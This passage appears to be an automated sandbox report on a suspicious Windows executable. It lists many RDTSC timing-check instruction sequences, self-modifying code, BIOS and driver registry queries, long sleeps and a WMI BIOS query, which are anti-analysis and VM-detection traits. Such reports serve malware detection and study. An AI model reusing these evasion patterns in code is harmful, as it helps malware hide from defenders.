                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 62C2BD second address: 62C2E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FB9E5277428h 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 pushad 0x00000011 popad 0x00000012 pop ecx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 62C2E3 second address: 62C2F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9E4B2921Ch 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 62CC21 second address: 62CC2B instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FB9E527741Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 634984 second address: 63498E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FB9E4B29216h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 634357 second address: 63435D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 63BD25 second address: 63BD36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FB9E4B29216h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 639E3E second address: 639E48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FB9E5277416h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 639E48 second address: 639E55 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FB9E4B29216h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 63A12B second address: 63A12F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 63AC6F second address: 63AC7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FB9E4B29216h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 63AC7E second address: 63AC82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 63AC82 second address: 63AC8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FB9E4B29216h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 63AC8E second address: 63AC99 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jno 00007FB9E5277416h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 63B4BB second address: 63B4C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 63B77E second address: 63B799 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FB9E5277416h 0x00000008 jns 00007FB9E5277416h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jno 00007FB9E5277416h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 63B799 second address: 63B79F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 63B79F second address: 63B7A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 63B7A5 second address: 63B7AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 63FB3E second address: 63FB42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 63FB42 second address: 63FB59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jng 00007FB9E4B2921Ch 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 63FFA4 second address: 63FFAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 63FFAF second address: 63FFB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 63FFB3 second address: 63FFB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 6400F3 second address: 640112 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB9E4B29221h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 640112 second address: 640135 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 jmp 00007FB9E5277428h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 6404F8 second address: 640519 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9E4B2921Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e jmp 00007FB9E4B2921Dh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 645140 second address: 64516C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB9E5277427h 0x00000009 jmp 00007FB9E5277421h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 64516C second address: 64517C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a je 00007FB9E4B29216h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 64D9B2 second address: 64D9B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 64D9B8 second address: 64D9CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB9E4B2921Dh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 64C2B9 second address: 64C2C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 64C438 second address: 64C453 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 jmp 00007FB9E4B29224h 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 64C6F7 second address: 64C716 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jne 00007FB9E527742Ah 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d jmp 00007FB9E5277422h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 64C716 second address: 64C725 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9E4B2921Ah 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 64C871 second address: 64C877 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 64C877 second address: 64C896 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB9E4B29229h 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 654387 second address: 6543A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 jmp 00007FB9E5277421h 0x0000000c popad 0x0000000d jnp 00007FB9E527741Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 653D84 second address: 653D8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 653F36 second address: 653F3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 653F3A second address: 653F5B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FB9E4B29221h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c push edx 0x0000000d pop edx 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 653F5B second address: 653F61 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 65F9F1 second address: 65F9F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 65F9F7 second address: 65FA53 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9E5277421h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007FB9E527741Fh 0x00000011 jmp 00007FB9E5277427h 0x00000016 jmp 00007FB9E527741Fh 0x0000001b popad 0x0000001c jno 00007FB9E527741Eh 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 65FA53 second address: 65FA6E instructions: 0x00000000 rdtsc 0x00000002 je 00007FB9E4B2922Dh 0x00000008 jmp 00007FB9E4B29221h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 65FBB4 second address: 65FBBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 65FBBA second address: 65FBBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 65FBBE second address: 65FBC4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 65FBC4 second address: 65FBD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b jns 00007FB9E4B29216h 0x00000011 pop edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 65FBD6 second address: 65FBE8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9E527741Dh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 661EFA second address: 661EFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 66BD1E second address: 66BD22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 66BD22 second address: 66BD42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushad 0x00000008 popad 0x00000009 pop esi 0x0000000a pushad 0x0000000b jg 00007FB9E4B2921Ah 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 jg 00007FB9E4B29216h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 66BD42 second address: 66BD50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FB9E5277416h 0x0000000a popad 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 66D363 second address: 66D3A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007FB9E4B29222h 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007FB9E4B2921Eh 0x00000013 push esi 0x00000014 pop esi 0x00000015 jo 00007FB9E4B29216h 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e jc 00007FB9E4B29216h 0x00000024 jmp 00007FB9E4B2921Ah 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 66D3A7 second address: 66D3B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 je 00007FB9E5277416h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 66D3B3 second address: 66D3BD instructions: 0x00000000 rdtsc 0x00000002 js 00007FB9E4B2921Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 678172 second address: 678178 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 678178 second address: 6781C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FB9E4B29229h 0x00000008 js 00007FB9E4B29216h 0x0000000e pop eax 0x0000000f jmp 00007FB9E4B2921Dh 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b jmp 00007FB9E4B29222h 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 6781C1 second address: 6781D4 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FB9E5277416h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jnp 00007FB9E5277416h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 6781D4 second address: 6781E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007FB9E4B29216h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 67B69D second address: 67B6A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 681034 second address: 681050 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FB9E4B29222h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 681050 second address: 681054 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 681054 second address: 681076 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9E4B29224h 0x00000007 jmp 00007FB9E4B2921Ah 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 681076 second address: 68108F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB9E5277425h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 67FA7E second address: 67FA95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007FB9E4B2921Eh 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 67FE63 second address: 67FE6A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 68038B second address: 68038F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 68038F second address: 680393 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 680393 second address: 6803AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FB9E4B29223h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 6803AE second address: 6803B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 6803B3 second address: 6803BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 680D44 second address: 680D60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FB9E5277426h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 683D59 second address: 683D63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FB9E4B29216h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 683D63 second address: 683D67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 683D67 second address: 683D70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 6838F9 second address: 6838FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 683A31 second address: 683A36 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 683A36 second address: 683A64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB9E5277422h 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007FB9E527741Dh 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push edi 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 6854CA second address: 6854DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9E4B2921Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 6854DC second address: 6854E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 6854E0 second address: 6854E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 68F27A second address: 68F28A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007FB9E5277418h 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 69E61E second address: 69E624 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 69E624 second address: 69E635 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB9E527741Dh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 6A39C2 second address: 6A39C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 6A3605 second address: 6A360B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 6B8A15 second address: 6B8A19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 6B78A8 second address: 6B78AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 6B78AD second address: 6B78C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB9E4B2921Eh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 6B78C1 second address: 6B78C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe Special instruction interceptor: First address: 4388A3 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe Special instruction interceptor: First address: 438978 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe Special instruction interceptor: First address: 6564AD instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe TID: 7212 Thread sleep time: -210000s >= -30000s
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe TID: 7212 Thread sleep time: -30000s >= -30000s
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
